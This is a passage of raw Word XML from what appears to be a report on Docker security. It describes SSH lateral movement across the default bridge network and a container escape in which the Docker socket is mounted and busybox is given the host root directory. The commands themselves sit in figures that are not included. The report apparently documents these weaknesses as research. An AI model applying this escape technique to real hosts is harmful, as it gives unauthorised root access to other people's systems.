        <w:t>ssh into a device</w:t>
      </w:r>
      <w:r w:rsidR="003B7978">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00700597">
        <w:t xml:space="preserve">is not configured for ssh connections unless </w:t>
      </w:r>
      <w:r w:rsidR="00225B02">
        <w:t>configured.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FD7">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="003379A0">
        <w:t xml:space="preserve">the containers are </w:t>
      </w:r>
      <w:r w:rsidR="002C0B6C">
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00A66F83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0B6C">
        <w:t xml:space="preserve">up to use the default </w:t>
      </w:r>
      <w:r w:rsidR="005A6804">
        <w:t>network bridge to</w:t>
      </w:r>
      <w:r w:rsidR="00BC0BC8">
        <w:t xml:space="preserve"> communicate</w:t>
      </w:r>
      <w:r w:rsidR="00E30FFD">
        <w:t xml:space="preserve"> locally</w:t>
      </w:r>
      <w:r w:rsidR="00A53FCA">
        <w:t xml:space="preserve">, and hence, </w:t>
      </w:r>
      <w:r w:rsidR="00FD6F5E">
        <w:t xml:space="preserve">it is possible to access any </w:t>
      </w:r>
      <w:r w:rsidR="00AC44D2">
        <w:t xml:space="preserve">container within the same </w:t>
      </w:r>
      <w:r w:rsidR="005E5E65">
        <w:t>bridge</w:t>
      </w:r>
      <w:r w:rsidR="008B7DC9">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00A47C7D">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A47C7D">
        <w:t xml:space="preserve">virtual bridge does not have the </w:t>
      </w:r>
      <w:r w:rsidR="00DF374A">
        <w:t xml:space="preserve">capabilities or features to filter </w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t xml:space="preserve">any incoming </w:t>
      </w:r>
      <w:r w:rsidR="00DF374A">
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidR="00117AE6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005E5E65">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008408E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00423219">
        <w:t>As such, t</w:t>
      </w:r>
      <w:r w:rsidR="008408E9">
        <w:t xml:space="preserve">his vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00FE432C">
        <w:t xml:space="preserve">enabled the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00234BF1">
        <w:t xml:space="preserve">to gain access </w:t>
      </w:r>
      <w:r w:rsidR="00594BD1">
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r w:rsidR="001F3678">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001F17C7">
        <w:t xml:space="preserve">exposed port 22 </w:t>
      </w:r>
      <w:r w:rsidR="003F0248">
        <w:t xml:space="preserve">to any other container </w:t>
      </w:r>
      <w:r w:rsidR="00610AA6">
        <w:t xml:space="preserve">connected to the </w:t>
      </w:r>
      <w:r w:rsidR="00B16D01">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00610AA6">
        <w:t>bridge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F54B2F" w14:textId="11FF2F77" w:rsidR="00AE09AC" w:rsidRDefault="00AE09AC" w:rsidP="00AE09AC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DB6D65" wp14:editId="0A00B6CD">
            <wp:extent cx="5251450" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="635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51450" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC9A36" w14:textId="1750805B" w:rsidR="00482190" w:rsidRDefault="00482190" w:rsidP="005C6C3C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc86858652"/>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C93687" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> A container </w:t>
      </w:r>
      <w:r w:rsidR="005644AB" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">accessing via ssh to </w:t>
      </w:r>
      <w:r w:rsidR="005C6C3C" w:rsidRPr="005C6C3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>non-ssh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="1E126B5B" w14:textId="4ECC5FF6" w:rsidR="004F6AE3" w:rsidRDefault="00B71794" w:rsidP="004F6AE3">
      <w:r>
        <w:t>In such attacks</w:t>
      </w:r>
      <w:r w:rsidR="004A03EE">
        <w:t xml:space="preserve">, the attacker can expand his/her </w:t>
      </w:r>
      <w:r w:rsidR="00AC67DF">
        <w:t xml:space="preserve">attacks onto </w:t>
      </w:r>
      <w:r w:rsidR="003B3FFF">
        <w:t xml:space="preserve">the host and other containers </w:t>
      </w:r>
      <w:r w:rsidR="00721527">
        <w:t>connected to the same bridge</w:t>
      </w:r>
      <w:r w:rsidR="00863793">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00146AAA">
        <w:t xml:space="preserve"> The attack container can now breakout to other containers</w:t>
      </w:r>
      <w:r w:rsidR="00EE2ED9">
        <w:t xml:space="preserve"> without any challenges</w:t>
      </w:r>
      <w:r w:rsidR="00F66DB0">
        <w:t xml:space="preserve">; however, escaping to the host </w:t>
      </w:r>
      <w:r w:rsidR="00DC2FAA">
        <w:t xml:space="preserve">requires a container </w:t>
      </w:r>
      <w:r w:rsidR="00B40903">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FAA">
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidR="008863BF">
        <w:t>Docker engine inside another container.</w:t>
      </w:r>
      <w:r w:rsidR="00E834A5">
        <w:t xml:space="preserve"> To achieve this, the author </w:t>
      </w:r>
      <w:r w:rsidR="007B271C">
        <w:t>applied the Docker commands in figure 62</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FA564A">
        <w:t>enabl</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00FA564A">
        <w:t xml:space="preserve"> the attacker to launch a container</w:t>
      </w:r>
      <w:r w:rsidR="006A2F2D">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00CA0630">
        <w:t xml:space="preserve">Docker features and </w:t>
      </w:r>
      <w:r w:rsidR="00C42A1E">
        <w:t>its volume mounted to</w:t>
      </w:r>
      <w:r w:rsidR="00A847C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42A1E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CA0630">
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="00F40946">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F2977">
        <w:t xml:space="preserve"> In Docker, the /var/run/docker.sock is</w:t>
      </w:r>
      <w:r w:rsidR="007E605D">
        <w:t xml:space="preserve"> the Unix socket </w:t>
      </w:r>
      <w:r w:rsidR="00BC77EF">
        <w:t>that allows API calls to communicate</w:t>
      </w:r>
      <w:r w:rsidR="002F1D19">
        <w:t xml:space="preserve"> by default.</w:t>
      </w:r>
      <w:r w:rsidR="00825EED">
        <w:t xml:space="preserve"> For this reason, the attacker can abuse th</w:t>
      </w:r>
      <w:r w:rsidR="00366FD5">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00546ACA">
        <w:t>docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="00366FD5">
        <w:t xml:space="preserve"> exposure</w:t>
      </w:r>
      <w:r w:rsidR="00C23F50">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="00AC4457">
        <w:t xml:space="preserve">mounting the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00C23F50">
        <w:t xml:space="preserve">socket gives the </w:t>
      </w:r>
      <w:r w:rsidR="005A34F6">
        <w:t xml:space="preserve">daemon’s </w:t>
      </w:r>
      <w:r w:rsidR="002309B1">
        <w:t>control to the attacker container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD88D2" w14:textId="4370FC0D" w:rsidR="00C01B9F" w:rsidRDefault="00C01B9F" w:rsidP="00C01B9F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCCA14D" wp14:editId="1154D3A1">
            <wp:extent cx="5422900" cy="288648"/>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22900" cy="288648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60825770" w14:textId="0B51AB5C" w:rsidR="00C01B9F" w:rsidRDefault="00C01B9F" w:rsidP="000336D4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc86858653"/>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000336D4" w:rsidRPr="000336D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploiting Docker socket.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="203D81F3" w14:textId="32AB6F9B" w:rsidR="001D2EDA" w:rsidRDefault="001D2EDA" w:rsidP="00143E8C">
      <w:r>
        <w:t xml:space="preserve">The attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00813894">
        <w:t xml:space="preserve">now run Docker commands on the container </w:t>
      </w:r>
      <w:r w:rsidR="0072791F">
        <w:t>as it</w:t>
      </w:r>
      <w:r w:rsidR="00B676E9">
        <w:t xml:space="preserve"> is launched to</w:t>
      </w:r>
      <w:r w:rsidR="0072791F">
        <w:t xml:space="preserve"> provide Docker pla</w:t>
      </w:r>
      <w:r w:rsidR="00FD03C5">
        <w:t>tform</w:t>
      </w:r>
      <w:r w:rsidR="00C73855">
        <w:t xml:space="preserve">, and the Docker daemon is </w:t>
      </w:r>
      <w:r w:rsidR="00AA1158">
        <w:t xml:space="preserve">under </w:t>
      </w:r>
      <w:r w:rsidR="002D7D6C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AA1158">
        <w:t xml:space="preserve">full control of the </w:t>
      </w:r>
      <w:r w:rsidR="008D48A0">
        <w:t>attacker’s container</w:t>
      </w:r>
      <w:r w:rsidR="00BE5681">
        <w:t>. As such, the attacker executes the Docker commands in figure 63</w:t>
      </w:r>
      <w:r w:rsidR="008541B4">
        <w:t>, escaping</w:t>
      </w:r>
      <w:r w:rsidR="005D581F">
        <w:t xml:space="preserve"> one level</w:t>
      </w:r>
      <w:r w:rsidR="00435C16">
        <w:t xml:space="preserve"> to see what </w:t>
      </w:r>
      <w:r w:rsidR="00A54D04">
        <w:t>Docker images are running on the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00FA4E87">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00321155">
        <w:t xml:space="preserve"> Because the daemon is wholly mounted</w:t>
      </w:r>
      <w:r w:rsidR="0039633A">
        <w:t xml:space="preserve"> to the attacker’s container, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00576EFA">
        <w:t>run and execute Docker commands remotely via the Docker socket</w:t>
      </w:r>
      <w:r w:rsidR="00611778">
        <w:t xml:space="preserve">. As a result, this vulnerability enabled the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00620949">
        <w:t xml:space="preserve">exploit and </w:t>
      </w:r>
      <w:r w:rsidR="00080FD5">
        <w:t xml:space="preserve">execute </w:t>
      </w:r>
      <w:r w:rsidR="00080FD5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">commands </w:t>
      </w:r>
      <w:r w:rsidR="00047FB2">
        <w:t>from his/her container. This means that</w:t>
      </w:r>
      <w:r w:rsidR="009F7549">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00047FB2">
        <w:t>the attacker can stop, delete</w:t>
      </w:r>
      <w:r w:rsidR="009F7549">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004379DB">
        <w:t>or remove any images or containers on the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00CF4EBF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DEA54" w14:textId="4F364E98" w:rsidR="00BF208C" w:rsidRDefault="00BF208C" w:rsidP="00BF208C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012853F2" wp14:editId="03292417">
            <wp:extent cx="4845050" cy="1674779"/>
            <wp:effectExtent l="0" t="0" r="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45050" cy="1674779"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171F748" w14:textId="183C5508" w:rsidR="00964871" w:rsidRDefault="00964871" w:rsidP="00831F5E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc86858654"/>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00831F5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Identifying Docker images on the host via the Docker socket.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="45F8D333" w14:textId="26B08DA7" w:rsidR="007B752E" w:rsidRDefault="008676D6" w:rsidP="007B752E">
      <w:r>
        <w:t xml:space="preserve">Similarly, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00CF3AEE">
        <w:t>launched another container</w:t>
      </w:r>
      <w:r w:rsidR="000F6C62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005979F7">
        <w:t>based on busybox, mounting the root directory</w:t>
      </w:r>
      <w:r w:rsidR="00C73EB9">
        <w:t xml:space="preserve"> “/” to </w:t>
      </w:r>
      <w:r w:rsidR="00561056">
        <w:t>the “/host” directory</w:t>
      </w:r>
      <w:r w:rsidR="007F6572">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00184CD0">
        <w:t>is created inside another container</w:t>
      </w:r>
      <w:r w:rsidR="00AE1C7E">
        <w:t>, as shown in figure 64</w:t>
      </w:r>
      <w:r w:rsidR="007F6572">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F75A8A">
        <w:t xml:space="preserve"> The reason for using busybox </w:t>
      </w:r>
      <w:r w:rsidR="003F7EF6">
        <w:t>Linux distribution is because it is lightweight and in</w:t>
      </w:r>
      <w:r w:rsidR="007F52C8">
        <w:t>cludes many Linux utilities.</w:t>
      </w:r>
      <w:r w:rsidR="00044C58">
        <w:t xml:space="preserve"> As can be seen, the container </w:t>
      </w:r>
      <w:r w:rsidR="00FC2079">
        <w:t xml:space="preserve">runs in root privilege, and thus the attacker can easily </w:t>
      </w:r>
      <w:r w:rsidR="00F26778">
        <w:t>exploit the host file system, as the entire root directory is mapped on</w:t>
      </w:r>
      <w:r w:rsidR="00964607">
        <w:t>to the “/host” directory on the host.</w:t>
      </w:r>
      <w:r w:rsidR="0046485A">
        <w:t xml:space="preserve"> As a result, the attacker gain</w:t>
      </w:r>
      <w:r w:rsidR="00643075">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="0046485A">
        <w:t xml:space="preserve"> full access with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00063948">
        <w:t xml:space="preserve"> to the Docker host </w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t>and surf</w:t>
      </w:r>
      <w:r w:rsidR="00F06564">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t xml:space="preserve"> on the host file system directories</w:t>
      </w:r>
      <w:r w:rsidR="003815C6">
        <w:t>, shown in figure 65</w:t>
      </w:r>
      <w:r w:rsidR="00B3589A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00080A30">
        <w:t xml:space="preserve"> This implies that</w:t>
      </w:r>
      <w:r w:rsidR="00A56099">
        <w:t xml:space="preserve"> the attacker can modify, delete</w:t>
      </w:r>
      <w:r w:rsidR="00F1499A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007C556E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00A365A4">
        <w:t>remove con</w:t>
      </w:r>
      <w:r w:rsidR="00376848">
        <w:t xml:space="preserve">fidential </w:t>
      </w:r>
      <w:r w:rsidR="00F1499A">
        <w:t>files on the host. Alternatively</w:t>
      </w:r>
      <w:r w:rsidR="00CF2B89">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FF2D5F">
        <w:t>he/she</w:t>
      </w:r>
      <w:r w:rsidR="00C46E48">
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="00F36FB9">
        <w:t>create and run malicious script</w:t>
      </w:r>
      <w:r w:rsidR="00867299">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F36FB9">
        <w:t xml:space="preserve"> on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58F9DD" w14:textId="46875091" w:rsidR="00597282" w:rsidRDefault="00597282" w:rsidP="00597282">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E043CE" wp14:editId="5796015D">
            <wp:extent cx="4133850" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="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33850" cy="584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="502AB67F" w14:textId="40027644" w:rsidR="00AE1C7E" w:rsidRDefault="00AE1C7E" w:rsidP="00D70C61">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc86858655"/>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
